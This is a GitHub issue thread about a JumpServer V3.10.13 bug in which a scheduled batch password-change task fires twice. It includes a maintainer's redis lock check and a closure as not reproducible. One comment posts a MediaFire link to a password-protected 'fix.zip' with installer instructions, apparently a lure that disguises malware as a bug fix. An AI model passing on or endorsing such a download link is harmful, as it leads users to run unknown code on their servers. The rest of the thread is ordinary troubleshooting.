### ISSUE TITLE
[Bug] 批量改密定时任务在达到预期时间时会自动触发两次，功能实现有误

### ISSUE THREAD

**Issue by sageonedream** [jumpserver/jumpserver#14039]
### 产品版本

V3.10.13

### 版本类型

- [ ] 社区版
- [ ] 企业版
- [X] 企业试用版

### 安装方式

- [ ] 在线安装 (一键命令安装)
- [X] 离线包安装
- [ ] All-in-One
- [ ] 1Panel
- [ ] Kubernetes
- [ ] 源码安装

### 环境信息

Centos 7.9
部署架构：单机部署

### 🐛 缺陷描述

设置批量改密的定时任务，在满足条件的情况下执行了两次

### 复现步骤

创建一个批量改密的定时任务，在达到预期时间时，查看任务执行次数

### 期望结果

定时改密在满足时间时，只执行一次

### 补充信息

![7d483a6cd9e3d454ec13da1a5aa164b](https://github.com/user-attachments/assets/be348c2c-7076-4478-9273-b86e503d1135)
![188668d8cebb333dfe7e34fe3423cf2](https://github.com/user-attachments/assets/554f288f-af1d-415f-a263-7ba86419f49c)

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BaiJiangJie** [comment]
进入到 jms_core 容器执行下面的命令看一下：

`cat -n /opt/py3/lib/python3.11/site-packages/redis/connection.py | grep "self._lock = threading"
`
如果是：
`  1029	        self._lock = threading.RLock()`

是正确的。

如果是：
`  1029	        self._lock = threading.Lock()
`是依赖不对。

**Comment by sageonedream** [comment]
经确认，后台执行结果如下图，表明依赖无误：
![f4086285700fcfb2756a22fb22c1f1a](https://github.com/user-attachments/assets/f6c68524-f542-4c8a-bead-57ee2046b3d7)

**Comment by jym503558564** [comment]
最新版本无法复现

**Comment by jym503558564** [comment]
用户无回复，当前最新版本无法复现，暂关闭该Issues.
